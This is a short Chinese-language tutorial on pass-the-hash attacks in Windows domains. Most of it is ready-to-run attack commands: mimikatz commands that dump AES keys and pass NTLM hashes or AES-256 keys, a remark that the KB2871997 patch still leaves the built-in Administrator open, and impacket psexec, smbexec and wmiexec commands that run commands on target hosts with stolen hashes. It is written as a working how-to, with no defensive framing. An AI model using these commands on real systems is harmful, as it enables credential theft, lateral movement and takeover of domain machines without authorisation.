哈希传递攻击

提示

哈希传递（Pass The Hash）攻击，直接将NTLM Hash的散列值传递到其它主机，进行权限认证，获取控制权。

在域环境中，用户大都使用域账号登录，大量计算机在安装时会使用相同的本地管理员账号和密码；

一、使用NTLM Hash进行哈希传递

使用mimikatz的哈希传递功能，必须具有本地管理员权限（mimikatz需要高权限进程lsass.exe的执行权限）

1）在目标机器中以管理员权限运行mimikatz

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:hacker.org /ntlm:<NTLM Hash>"
#<NTLM Hash>为：f3a0acba8bcfb8a0896281bbfcb793ed这样的一串字符

2）列出目标域控C盘内容（会自动弹出一个cmd.exe）

dir \\DC\c$   #测试是否成功

二、使用AES-256进行哈希传递

当系统安装了KB2871997补丁，将无法使用常规的哈希传递攻击；

但是SID为500的Admintrator用户，依然可以使用哈希传递，或者使用AES-256进行哈希传递。

1）抓取AES-256密钥

mimikatz.exe "privilege::debug" "sekurlsa::ekeys"

2）管理员权限运行mimikatz

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:hacker.org /aes256:<AES-256密钥>"

三、不使用mimikatz进行哈希传递

1、目标能出网的话我一般直接用CS去横向传递Hash上线主机

2、使用impacket软件包

psexec.py -hashes :<hash> 域/域用户名@目标IP
smbexec.py -hashes :<hash> 域/域用户名@目标IP
wmiexec.py -hashes :<hash> 域/域用户名r@目标IP whoami